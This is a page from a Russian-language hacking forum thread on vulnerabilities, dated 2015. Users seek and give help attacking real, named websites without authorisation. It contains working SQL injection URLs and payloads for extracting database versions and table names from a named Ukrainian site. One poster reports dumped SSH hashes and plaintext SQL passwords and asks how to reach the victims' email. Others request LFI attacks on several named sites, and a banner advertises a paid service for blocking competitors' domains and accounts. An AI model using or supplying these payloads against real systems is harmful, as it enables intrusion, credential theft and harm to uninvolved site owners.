Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2402 из 2422

2402

Опции темы

Поиск в этой теме

Опции просмотра

16.04.2015, 15:45

vikler

Познающий

Регистрация: 16.08.2012

Сообщений: 92

С нами: 7231286

Репутация: 0

Есть доступ ко всем файлам на сервере, вытащила ssh хэши, пароли SQL в чистом виде. в общем, это здорово, но мне нужен доступ к их почтам. Не подскажете, где могут быть конфиги?

EDIT: они юзают horde webmail=>/etc/psa/.webmail.shadow верно? Но этот файл закрыт на чтение root only FUCK. Неужели нет никаких более способов? Неужели я потратила целый день за зря ? ну таааааааааааааак обидно, сил нет

𝕏 Twitter Reddit Telegram Копировать ссылку

17.04.2015, 20:16

xxl

Новичок

Регистрация: 22.11.2012

Сообщений: 21

С нами: 7090166

Репутация: 0

SquirrelMail 1.4.21 - есть ли уязвимости? Погуглил - информация о наличии уязвимостей есть,но нет эксплойтов...

+ ISPmanager v4 lite. Есть ли что-то? (кроме открытой передачи пароля в API)

18.04.2015, 22:18

teh

Познающий

Регистрация: 02.12.2010

Сообщений: 79

С нами: 8128406

Репутация: -2

http://www.techexpo.kiev.ua/info_pa...ogin,4 from eebcnet_techexpo.users--&sub_id=1

помогите не могу раскрутить

19.04.2015, 02:32

xxl

Новичок

Регистрация: 22.11.2012

Сообщений: 21

С нами: 7090166

Репутация: 0

Цитата:

Сообщение от teh

↑
http://www.techexpo.kiev.ua/info_page.php?id=-37 union select 1,2,ulogin,4 from eebcnet_techexpo.users--&sub_id=1
помогите не могу раскрутить

http://www.techexpo.kiev.ua/info_page.php?id=-37 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY MID(VERSION(), FLOOR(RAND(0)*2), 64)) - версия БД.

(

это если ручками хочешь перебирать,а так:

sqlmap сказал,что

[WARNING] no table(s) found.

Но он пиздит 100%,там самому надо перебирать(SELECT table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema = 'DB')

)

19.04.2015, 07:32

kingbeef

Новичок

Регистрация: 08.04.2010

Сообщений: 1

С нами: 8469890

Репутация: 0

Цитата:

Сообщение от teh

↑
http://www.techexpo.kiev.ua/info_page.php?id=-37 union select 1,2,ulogin,4 from eebcnet_techexpo.users--&sub_id=1
помогите не могу раскрутить

Там нету такой таблицы

http://www.techexpo.kiev.ua/info_pa...656562636e65745f746563686578706f--+k&sub_id=1

eebc.cms_users

19.04.2015, 20:20

teh

Познающий

Регистрация: 02.12.2010

Сообщений: 79

С нами: 8128406

Репутация: -2

http://www.techexpo.kiev.ua/info_pa...e,4 from information_schema.tables--&sub_id=1

но, information_schema показывает что она существует

19.04.2015, 21:52

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

Цитата:

Сообщение от teh

↑
http://www.techexpo.kiev.ua/info_page.php?id=-37 union select 1,2,table_name,4 from information_schema.tables--&sub_id=1
но, information_schema показывает что она существует

таким запросом вы увидите список всех таблиц из всех доступных бд. чтобы узнать таблицы из конкретной бд используйте where

20.04.2015, 01:33

teh

Познающий

Регистрация: 02.12.2010

Сообщений: 79

С нами: 8128406

Репутация: -2

Цитата:

Сообщение от faza02

↑
таким запросом вы увидите список всех таблиц из всех доступных бд. чтобы узнать таблицы из конкретной бд используйте where

спасибо, понял

20.04.2015, 12:42

YaBtr

Постоянный

Регистрация: 30.05.2012

Сообщений: 600

С нами: 7343606

Репутация: 652

Цитата:

Сообщение от xxl

↑

можно ли раскрутить самому? и как

xxl , если хотите, чтобы Вам помогли, то нужно задавать корректный и внятный вопрос, а еще лучше, опубликовать ссылку на язвимый сайт. Читайте правила! Если не отредактируете, пост будет удален.

#10

20.04.2015, 16:45

sunnyfruit

Новичок

Регистрация: 08.05.2013

Сообщений: 16

С нами: 6849686

Репутация: 0

Парни, подскажите, можно тут раскрутить php LFI:

https://autopaymentfinder.com/dealers/index.php?p=ll

http://yll.cce.tw/mastersys.php?mode=cent

http://svadesi.com/tagsdb/actor_page.php?lang=jj&tag=lucky ali

Страница 2402 из 2422

2402

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57